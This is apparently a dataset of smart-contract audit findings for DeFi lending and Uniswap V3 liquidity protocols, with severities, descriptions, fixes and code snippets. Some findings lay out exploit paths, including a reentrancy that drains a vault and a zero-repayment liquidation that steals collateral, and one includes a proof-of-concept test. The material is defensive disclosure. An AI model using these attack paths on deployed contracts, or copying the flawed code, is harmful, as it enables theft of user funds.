Some lender depositors who can't withdraw might still have incentive to liquidate Alice to be able to withdraw from lender, but Alice's ante will still be stuck in the contract.\\nThe scenario above is demonstrated in the test, add it to test/Liquidator.t.sol:\\n```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User assets:"", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n emit log_named_uint(""Liquidated User ante:"", address(account).balance);\\n }\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 150000000000000000000\\n User assets:: 101000000000000000000\\n Liquidated User borrow:: 49000000162000000001\\n Liquidated User assets:: 0\\n Liquidated User ante:: 10000000000000001\\n```\\n","Consider verifying the bad debt situation and not forcing swap which will fail, so that liquidation can repay whatever assets account still has and give liquidator 
its full bonus.","Liquidators are not compensated for bad debt liquidations in some cases. Ante (liquidator bonus) is stuck in the borrower smart contract until bad debt is repaid. There is not enough incentive to liquidate such bad debt accounts, which can lead for these accounts to accumulate even bigger bad debt and lender depositors being unable to withdraw their funds from lender.","```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User assets:"", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n emit log_named_uint(""Liquidated User ante:"", address(account).balance);\\n }\\n```\\n" +Oracle.sol: observe function has overflow risk and should cast to uint256 like Uniswap V3 does,medium,"Looking at the `Oracle.observe` function, the `secondsPerLiquidityCumulativeX128` return value is calculated as follows:\\n```\\nliqCumL + uint160(((liqCumR - liqCumL) * 
delta) / denom)\\n```\\n\\nThe calculation is done in an `unchecked` block. `liqCumR` and `liqCumL` have type `uint160`.\\n`delta` and `denom` have type `uint56`.\\nLet's compare this to the Uniswap V3 code.\\n```\\nbeforeOrAt.secondsPerLiquidityCumulativeX128 +\\n uint160(\\n (uint256(\\n atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128\\n ) * targetDelta) / observationTimeDelta\\n )\\n```\\n\\nThe result of `atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128` is cast to `uint256`.\\nThat's because multiplying the result by `targetDelta` can overflow the `uint160` type.\\nThe maximum value of `uint160` is roughly `1.5e48`.\\n`delta` is simply the time difference between `timeL` and `target` in seconds.\\n```\\nsecondsPerLiquidityCumulativeX128: last.secondsPerLiquidityCumulativeX128 +\\n ((uint160(delta) << 128) / (liquidity > 0 ? liquidity : 1)),\\n```\\n\\nIf `liquidity` is very low and the time difference between observations is very big (hours to days), this can lead to the intermediate overflow in the `Oracle` library, such that the `secondsPerLiquidityCumulative` is much smaller than it should be.\\nThe lowest value for the above division is `1`. In that case the accumulator grows by `2^128` (~3.4e38) every second.\\nIf observations are apart 24 hours (86400 seconds), this can lead to an overflow: Assume for simplicity `target - timeL = timeR - timeL`\\n```\\n(liqCumR - liqCumL) * delta = 3.4e38 * 86400 * 86400 > 1.5e48`\\n```\\n",Perform the same cast to `uint256` that Uniswap V3 performs:\\n```\\nliqCumL + uint160((uint256(liqCumR - liqCumL) * delta) / denom)\\n```\\n,"The corrupted return value affects the `Volatility` library. 
Specifically, the IV calculation.\\nThis can lead to wrong IV updates and LTV ratios that do not reflect the true IV, making the application more prone to bad debt or reducing capital efficiency.",```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n +"The whole ante balance of a user with a very small loan, who is up for liquidation can be stolen without repaying the debt",medium,"Users face liquidation risk when their Borrower contract's collateral falls short of covering their loan. The `strain` parameter in the liquidation process enables liquidators to partially repay an unhealthy loan. Using a `strain` smaller than 1 results in the liquidator receiving a fraction of the user's collateral based on `collateral / strain`.\\nThe problem arises from the fact that the `strain` value is not capped, allowing for a potentially harmful scenario. For instance, a user with an unhealthy loan worth $0.30 in a WBTC (8-decimal token) vault on Arbitrum (with very low gas costs) has $50 worth of ETH (with a price of $1500) as collateral in their Borrower contract. A malicious liquidator spots the unhealthy loan and submits a liquidation transaction with a `strain` value of 1e3 + 1. 
Since the `strain` exceeds the loan value, the liquidator's repayment amount gets rounded down to 0, effectively allowing them to claim the collateral with only the cost of gas.\\n```\\nassembly (""memory-safe"") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n\\nFollowing this, the execution bypasses the `shouldSwap` if-case and proceeds directly to the following lines:\\n```\\n// @audit Won't be repaid in full since the loan is insolvent\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\n// @audit will transfer the user 2e14 (0.5$)\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nGiven the low gas price on Arbitrum, this transaction becomes profitable for the malicious liquidator, who can repeat it to drain the user's collateral without repaying the loan. This not only depletes the user's collateral but also leaves a small amount of bad debt on the market, potentially causing accounting issues for the vaults.","Consider implementing a check to determine whether the repayment impact is zero or not before transferring ETH to such liquidators.\\n```\\nrequire(repayable0 != 0 || repayable1 != 0, ""Zero repayment impact."") // @audit <-\\n_repay(repayable0, repayable1);\\n\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nAdditionally, contemplate setting a cap for the `strain` and potentially denoting it in basis points (BPS) instead of a fraction. 
This allows for more flexibility when users intend to repay a percentage lower than 100% but higher than 50% (e.g., 60%, 75%, etc.).","Users with small loans face the theft of their collateral without the bad debt being covered, leading to financial losses for the user. Additionally, this results in a potential amount of bad debt that can disrupt the vault's accounting.","```\\nassembly (""memory-safe"") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n" +Wrong auctionPrice used in calculating BPF to determine bond reward (or penalty),medium,"2.In _prepareTake() function,the BPF is calculated using vars.auctionPrice which is calculated by _auctionPrice() function.\\n```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n\\n3.The _takeBucket() function made a judgment after _prepareTake()\\n```\\n // cannot arb with a price lower than the auction price\\nif (vars_.auctionPrice > vars_.bucketPrice) revert AuctionPriceGtBucketPrice();\\n// if deposit take then price to use when calculating take is bucket price\\nif (params_.depositTake) vars_.auctionPrice = vars_.bucketPrice;\\n```\\n\\nso the root cause of this issue is that in a scenario where a user calls Deposit Take(params_.depositTake ==true) ,BPF will calculated base on vars_.auctionPrice instead of bucketPrice.\\n```\\n vars_ = _calculateTakeFlowsAndBondChange(\\n borrower_.collateral,\\n params_.inflator,\\n 
params_.collateralScale,\\n vars_\\n );\\n// rest of code// rest of code// rest of code// rest of code.\\n_rewardBucketTake(\\n auctions_,\\n deposits_,\\n buckets_,\\n liquidation,\\n params_.index,\\n params_.depositTake,\\n vars_\\n );\\n```\\n",In the case of Deposit Take calculate BPF using bucketPrice instead of auctionPrice .,"Wrong auctionPrice used in calculating BFP which subsequently influences the _calculateTakeFlowsAndBondChange() and _rewardBucketTake() function will result in bias .\\nFollowing the example of the Whitepaper(section 7.4.2 Deposit Take): BPF = 0.011644 * (1222.6515-1100 / 1222.6515-1050) = 0.008271889129 The collateral purchased is min{20, 20000/(1-0.00827) * 1100, 21000/(1-0.01248702772 )* 1100)} which is 18.3334 unit of ETH .Therefore, 18.3334 ETH are moved from the loan into the claimable collateral of bucket 1100, and the deposit is reduced to 0. Dave is awarded LPB in that bucket worth 18. 3334 · 1100 · 0. 008271889129 = 166. 8170374 𝐷𝐴𝐼. The debt repaid is 19914.99407 DAI\\n\\nBased on the current implementations: BPF = 0.011644 * (1222.6515-1071.77 / 1222.6515-1050) = 0.010175. TPF = 5/4*0.011644 - 1/4 *0.010175 = 0.01201125. The collateral purchased is 18.368 unit of ETH. The debt repaid is 20000 * (1-0.01201125) / (1-0.010175) = 19962.8974DAI Dave is awarded LPB in that bucket worth 18. 368 · 1100 · 0. 010175 = 205.58 𝐷𝐴𝐼.\\nSo,Dave earn more rewards(38.703 DAI) than he should have.\\nAs the Whitepaper says: "" the caller would typically have other motivations. She might have called it because she is Carol, who wanted to buy the ETH but not add additional DAI to the contract. She might be Bob, who is looking to get his debt repaid at the best price. She might be Alice, who is looking to avoid bad debt being pushed into the contract. 
She also might be Dave, who is looking to ensure a return on his liquidation bond.""","```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n" +Incorrect implementation of `BPF` leads to kicker losing rewards in a `take` action,medium,"The Bond Payment Factor (BPF) is the formula that determines the reward/penalty over the bond of a kicker in each `take` action. According to the whitepaper, the formula is described as:\\n```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(-1, (neutralPrice - price) / (neutralPrice - thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n -1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) - int256(auctionPrice_),\\n int256(neutralPrice_) - thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) - int256(auctionPrice_);\\n if (val < 0 ) sign = -1e18;\\n else if (val != 0) sign = 1e18; // @audit Sign will be zero when NP = auctionPrice\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n\\nThe issue is that the implementation of the `BPF` formula in the code doesn't match the 
specification, leading to the loss of rewards in that `take` action in cases where `TP >= NP` and `price = NP`.\\nAs showed in the above snippet, in cases where `TP >= NP` and `NP = price` (thus val = 0) the function won't set a value for `sign` (will be `0` by default) so that will result in a computed `BPF` of `0`, instead of `bondFactor` that would be the correct `BPF`.","Change the `_bpf` function to match the specification in order to fairly distribute the rewards in a `take` action:\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(// Remove the line below\\n1, (neutralPrice // Remove the line below\\n price) / (neutralPrice // Remove the line below\\n thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n // Remove the line below\\n1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_),\\n int256(neutralPrice_) // Remove the line below\\n thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_);\\n if (val < 0 ) sign = // Remove the line below\\n1e18;\\n// Remove the line below\\n else if (val != 0) sign = 1e18;\\n// Add the line below\\n else sign = 1e18;\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n","The kicker will lose the rewards in that `take` action if the previous conditions are satisfied.\\nWhile the probability of this conditions to be met is not usual, the impact is the loss of rewards for that kicker and that may cause to lose part of the bond if later a `take` is performed with a negative `BPF`.","```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If 
TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n" +First pool borrower pays extra interest,medium,"For any function in which the current interest rate is important in a pool, we compute interest updates by accruing with `_accruePoolInterest` at the start of the function, then execute the main logic, then update the interest state accordingly with `_updateInterestState`. See below a simplified example for ERC20Pool.drawDebt:\\n```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n\\nWhen accruing interest in `_accruePoolInterest`, we only update the state if `poolState_.t0Debt != 0`. Most notably, we don't set `poolState_.isNewInterestAccrued`. 
See below simplified logic from _accruePoolInterest:\\n```\\n// check if t0Debt is not equal to 0, indicating that there is debt to be tracked for the pool\\nif (poolState_.t0Debt != 0) {\\n // rest of code\\n\\n // calculate elapsed time since inflator was last updated\\n uint256 elapsed = block.timestamp - inflatorState.inflatorUpdate;\\n\\n // set isNewInterestAccrued field to true if elapsed time is not 0, indicating that new interest may have accrued\\n poolState_.isNewInterestAccrued = elapsed != 0;\\n\\n // rest of code\\n}\\n```\\n\\nOf course before we actually update the state from the first borrow, the debt of the pool is 0, and recall that `_accruePoolInterest` runs before the main state changing logic of the function in `BorrowerActions.drawDebt`.\\nAfter executing the main state changing logic in `BorrowerActions.drawDebt`, where we update state, including incrementing the pool and borrower debt as expected, we run the logic in `_updateInterestState`. Here we update the inflator if either `poolState_.isNewInterestAccrued` or `poolState_.debt == 0`.\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n} else if (poolState_.debt == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n\\nThe problem here is that since there was no debt at the start of the function, `poolState_.isNewInterestAccrued` is false and since there is debt now at the end of the function, `poolState_.debt == 0` is also false. As a result, the inflator is not updated. Updating the inflator here is paramount since it effectively marks a starting time at which interest accrues on the borrowers debt. 
Since we don't update the inflator, the borrowers debt effectively started accruing interest at the time of the last inflator update, which is an arbitrary duration.\\nWe can prove this vulnerability by modifying `ERC20PoolBorrow.t.sol:testPoolBorrowAndRepay` to skip 100 days before initially drawing debt:\\n```\\nfunction testPoolBorrowAndRepay() external tearDown {\\n // check balances before borrow\\n assertEq(_quote.balanceOf(address(_pool)), 50_000 * 1e18);\\n assertEq(_quote.balanceOf(_lender), 150_000 * 1e18);\\n\\n // @audit skip 100 days to break test\\n skip(100 days);\\n\\n _drawDebt({\\n from: _borrower,\\n borrower: _borrower,\\n amountToBorrow: 21_000 * 1e18,\\n limitIndex: 3_000,\\n collateralToPledge: 100 * 1e18,\\n newLup: 2_981.007422784467321543 * 1e18\\n });\\n\\n // rest of code\\n}\\n```\\n\\nUnlike the result without skipping time before drawing debt, the test fails with output logs being off by amounts roughly corresponding to the unexpected interest.","Issue First pool borrower pays extra interest\\nWhen checking whether the debt of the pool is 0 to determine whether to reset the inflator, it should not only check whether the debt is 0 at the end of execution, but also whether the debt was 0 before execution. 
To do so, we should cache the debt at the start of the function and modify the `_updateInterestState` logic to be something like:\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n// @audit reset inflator if no debt before execution\\n} else if (poolState_.debt == 0 || debtBeforeExecution == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n","First borrower always pays extra interest, with losses depending upon time between adding liquidity and drawing debt and amount of debt drawn.\\nNote also that there's an attack vector here in which the liquidity provider can intentionally create and fund the pool a long time before announcing it, causing the initial borrower to lose a significant amount to interest.","```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n" +Function `_indexOf` will cause a settlement to revert if `auctionPrice > MAX_PRICE`,medium,"In ERC721 pools, when a settlement occurs and the borrower still have some fraction of collateral, that fraction is allocated in the bucket with a price closest to `auctionPrice` and the 
borrower is proportionally compensated with LPB in that bucket.\\nIn order to calculate the index of the bucket closest in price to `auctionPrice`, the `_indexOf` function is called. The first line of that function is outlined below:\\n```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n\\nThe `_indexOf` function will revert if `price_` (provided as an argument) is below `MIN_PRICE` or above `MAX_PRICE`. This function is called from `_settleAuction`, here is a snippet of that:\\n```\\nfunction _settleAuction(\\n AuctionsState storage auctions_,\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n address borrowerAddress_,\\n uint256 borrowerCollateral_,\\n uint256 poolType_\\n) internal returns (uint256 remainingCollateral_, uint256 compensatedCollateral_) {\\n\\n // // rest of code\\n\\n uint256 auctionPrice = _auctionPrice(\\n auctions_.liquidations[borrowerAddress_].referencePrice,\\n auctions_.liquidations[borrowerAddress_].kickTime\\n );\\n\\n // determine the bucket index to compensate fractional collateral\\n> bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n\\n // // rest of code\\n}\\n```\\n\\nThe `_settleAuction` function first calculates the `auctionPrice` and then it gets the index of the bucket with a price closest to `bucketPrice`. If `auctionPrice` results to be bigger than `MAX_PRICE`, then the `_indexOf` function will revert and the entire settlement will fail.\\nIn certain types of pools where one asset has an extremely low market price and the other is valued really high, the resulting prices at an auction can be so high that is not rare to see an `auctionPrice > MAX_PRICE`.\\nThe `auctionPrice` variable is computed from `referencePrice` and it goes lower through time until 72 hours have passed. 
Also, `referencePrice` can be much higher than `MAX_PRICE`, as outline in _kick:\\n```\\nvars.referencePrice = Maths.min(Maths.max(vars.htp, vars.neutralPrice), MAX_INFLATED_PRICE);\\n```\\n\\nThe value of `MAX_INFLATED_PRICE` is exactly 50 * `MAX_PRICE` so a `referencePrice` bigger than `MAX_PRICE` is totally possible.\\nIn auctions where `referencePrice` is bigger than `MAX_PRICE` and the auction is settled in a low time frame, `auctionPrice` will be also bigger than `MAX_PRICE` and that will cause the entire transaction to revert.",It's recommended to change the affected line of `_settleAuction` in the following way:\\n```\\n// Remove the line below\\n bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n// Add the line below\\n if(auctionPrice < MIN_PRICE){\\n// Add the line below\\n bucketIndex = MAX_FENWICK_INDEX;\\n// Add the line below\\n } else if (auctionPrice > MAX_PRICE) {\\n// Add the line below\\n bucketIndex = 1;\\n// Add the line below\\n } else {\\n// Add the line below\\n bucketIndex = _indexOf(auctionPrice);\\n// Add the line below\\n }\\n```\\n,"When the above conditions are met, the auction won't be able to settle until `auctionPrice` lowers below `MAX_PRICE`.\\nIn ERC721 pools with a high difference in assets valuation, there is no low-probability prerequisites and the impact will be a violation of the system design, as well as the potential losses for the kicker of that auction, so setting severity to be high",```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n +Adversary can reenter takeOverDebt() during liquidation to steal vault funds,high,"First we'll walk through a high level breakdown of the issue to have as context for the rest of the report:\\nCreate a custom token that allows them to take control of the transaction and to prevent liquidation\\nFund UniV3 LP with target token and custom token\\nBorrow against LP with target token as the hold token\\nAfter some 
time the position become liquidatable\\nBegin liquidating the position via repay()\\nUtilize the custom token during the swap in repay() to gain control of the transaction\\nUse control to reenter into takeOverDebt() since it lack nonReentrant modifier\\nLoan is now open on a secondary address and closed on the initial one\\nTransaction resumes (post swap) on repay()\\nFinish repayment and refund all initial LP\\nPosition is still exists on new address\\nAfter some time the position become liquidatable\\nLoan is liquidated and attacker is paid more LP\\nVault is at a deficit due to refunding LP twice\\nRepeat until the vault is drained of target token\\nLiquidityManager.sol#L279-L287\\n```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n\\nThe control transfer happens during the swap to UniV3. Here when the custom token is transferred, it gives control back to the attacker which can be used to call takeOverDebt().\\nLiquidityBorrowingManager.sol#L667-L672\\n```\\n _removeKeysAndClearStorage(borrowing.borrower, params.borrowingKey, loans);\\n // Pay a profit to a msg.sender\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n\\n emit Repay(borrowing.borrower, msg.sender, params.borrowingKey);\\n```\\n\\nThe reason the reentrancy works is because the actual borrowing storage state isn't modified until AFTER the control transfer. This means that the position state is fully intact for the takeOverDebt() call, allowing it to seamlessly transfer to another address behaving completely normally. 
After the repay() call resumes, _removeKeysAndClearStorage is called with the now deleted borrowKey.\\nKeys.sol#L31-L42\\n```\\nfunction removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nThe unique characteristic of deleteKey is that it doesn't revert if the key doesn't exist. This allows ""removing"" keys from an empty array without reverting. This allows the repay call to finish successfully.\\nLiquidityBorrowingManager.sol#L450-L452\\n```\\n //newBorrowing.accLoanRatePerSeconds = oldBorrowing.accLoanRatePerSeconds;\\n _pay(oldBorrowing.holdToken, msg.sender, VAULT_ADDRESS, collateralAmt + feesDebt);\\n emit TakeOverDebt(oldBorrowing.borrower, msg.sender, borrowingKey, newBorrowingKey);\\n```\\n\\nNow we can see how this creates a deficit in the vault. When taking over an existing debt, the user is only required to provide enough hold token to cover any fee debt and any additional collateral to pay fees for the newly transferred position. This means that the user isn't providing any hold token to back existing LP.\\nLiquidityBorrowingManager.sol#L632-L636\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nOn the other hand repay transfers the LP backing funds from the vault. Since the same position is effectively liquidated twice, it will withdraw twice as much hold token as was originally deposited and no new LP funds are added when the position is taken over. 
This causes a deficit in the vault since other users funds are being withdrawn from the vault.",Add the `nonReentrant` modifier to `takeOverDebt()`,Vault can be drained,"```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n" +Creditor can maliciously burn UniV3 position to permanently lock funds,high,"NonfungiblePositionManager\\n```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, ""ERC721: owner query for nonexistent token"");\\n}\\n```\\n\\nWhen querying a nonexistent token, ownerOf will revert. Now assuming the NFT is burnt we can see how every method for repayment is now lost.\\nLiquidityManager.sol#L306-L308\\n```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n```\\n\\nIf the user is being liquidated or repaying themselves the above lines are called for each loan. This causes all calls of this nature to revert.\\nLiquidityBorrowingManager.sol#L727-L732\\n```\\n for (uint256 i; i < loans.length; ) {\\n LoanInfo memory loan = loans[i];\\n // Get the owner address of the loan's token ID using the underlyingPositionManager contract.\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Check if the owner of the loan's token ID is equal to the `msg.sender`.\\n if (creditor == msg.sender) {\\n```\\n\\nThe only other option to recover funds would be for each of the other lenders to call for an emergency withdrawal. The problem is that this pathway will also always revert. It cycles through each loan causing it to query ownerOf() for each token. As we know this reverts. 
The final result is that once this happens, there is no way possible to close the position.","I would recommend storing each initial creditor when a loan is opened. Add try-catch blocks to each `ownerOf()` call. If the call reverts then use the initial creditor, otherwise use the current owner.",Creditor can maliciously lock all funds,"```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, ""ERC721: owner query for nonexistent token"");\\n}\\n```\\n" +No slippage protection during repayment due to dynamic slippage params and easily influenced `slot0()`,high,"The absence of slippage protection can be attributed to two key reasons. Firstly, the `sqrtPrice` is derived from `slot0()`, which can be easily manipulated:\\n```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n\\nThe calculated `sqrtPriceX96` is used to determine the amounts for restoring liquidation and the number of holdTokens to be swapped for saleTokens:\\n```\\n(uint256 holdTokenAmountIn, uint256 amount0, uint256 amount1) = _getHoldTokenAmountIn(\\n params.zeroForSaleToken,\\n cache.tickLower,\\n cache.tickUpper,\\n cache.sqrtPriceX96,\\n loan.liquidity,\\n cache.holdTokenDebt\\n );\\n```\\n\\nAfter that, the number of `SaleTokemAmountOut` is gained based on the sqrtPrice via QuoterV2.\\nThen, the slippage params are calculated `amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) / Constants.BPS })` However, the `saleTokenAmountOut` is a dynamic number calculated on the current state of the blockchain, based on the calculations mentioned above. 
